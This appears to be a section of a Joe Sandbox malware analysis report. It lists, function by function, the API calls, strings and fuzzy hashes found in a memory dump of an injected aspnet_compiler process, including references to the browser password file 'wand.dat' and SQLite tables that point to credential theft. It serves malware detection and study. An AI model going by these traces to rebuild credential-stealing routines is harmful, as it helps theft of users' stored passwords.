                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1889144086-0
                                                                                                                                                                                                                                                                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                                                                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1661045500-0
                                                                                                                                                                                                                                                                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                                                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                                                                                                                                                                  • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                                                                                                                                                                  • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                                                                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                                                  • API String ID: 1297977491-2063813899
                                                                                                                                                                                                                                                                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                                                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040560C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                                                                                                  • String ID: *.*$dat$wand.dat
                                                                                                                                                                                                                                                                  • API String ID: 2618321458-1828844352
                                                                                                                                                                                                                                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 00410C74
                                                                                                                                                                                                                                                                  • _wtoi.MSVCRT ref: 00410C80
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1549203181-0
                                                                                                                                                                                                                                                                  • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                                                                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3550944819-0
                                                                                                                                                                                                                                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040A94F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3023356884-0
                                                                                                                                                                                                                                                                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                                                                                                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                                                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040B248
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3023356884-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                                                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                                                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                                                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1865533344-0
                                                                                                                                                                                                                                                                  • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                                                                  • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                                                                                                                                                                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0040B159
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ??3@$memcpy$mallocstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1171893557-0
                                                                                                                                                                                                                                                                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                                                    • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1127616056-0
                                                                                                                                                                                                                                                                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                                                                                                  • String ID: sqlite_master
                                                                                                                                                                                                                                                                  • API String ID: 438689982-3163232059
                                                                                                                                                                                                                                                                  • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                                                                  • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3917621476-0
                                                                                                                                                                                                                                                                  • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                                                                  • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 822687973-0
                                                                                                                                                                                                                                                                  • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                                                                  • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74CB5970,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                                                  • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74CB5970,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.396335047.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$??3@malloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4284152360-0
                                                                                                                                                                                                                                                                  • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                                                                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
